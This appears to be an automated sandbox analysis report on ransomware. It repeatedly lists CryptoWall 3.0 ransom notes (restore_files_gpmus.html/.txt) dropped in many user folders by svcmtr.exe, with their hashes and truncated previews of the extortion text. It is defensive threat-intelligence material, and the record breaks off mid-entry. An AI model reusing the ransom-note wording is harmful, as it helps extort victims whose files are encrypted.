                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Adobe\Color\Profiles\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Adobe\Color\Profiles\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Adobe\Color\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Adobe\Color\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Adobe\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Adobe\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\CEF\User Data\Dictionaries\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\CEF\User Data\Dictionaries\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\CEF\User Data\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\CEF\User Data\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\CEF\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\CEF\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
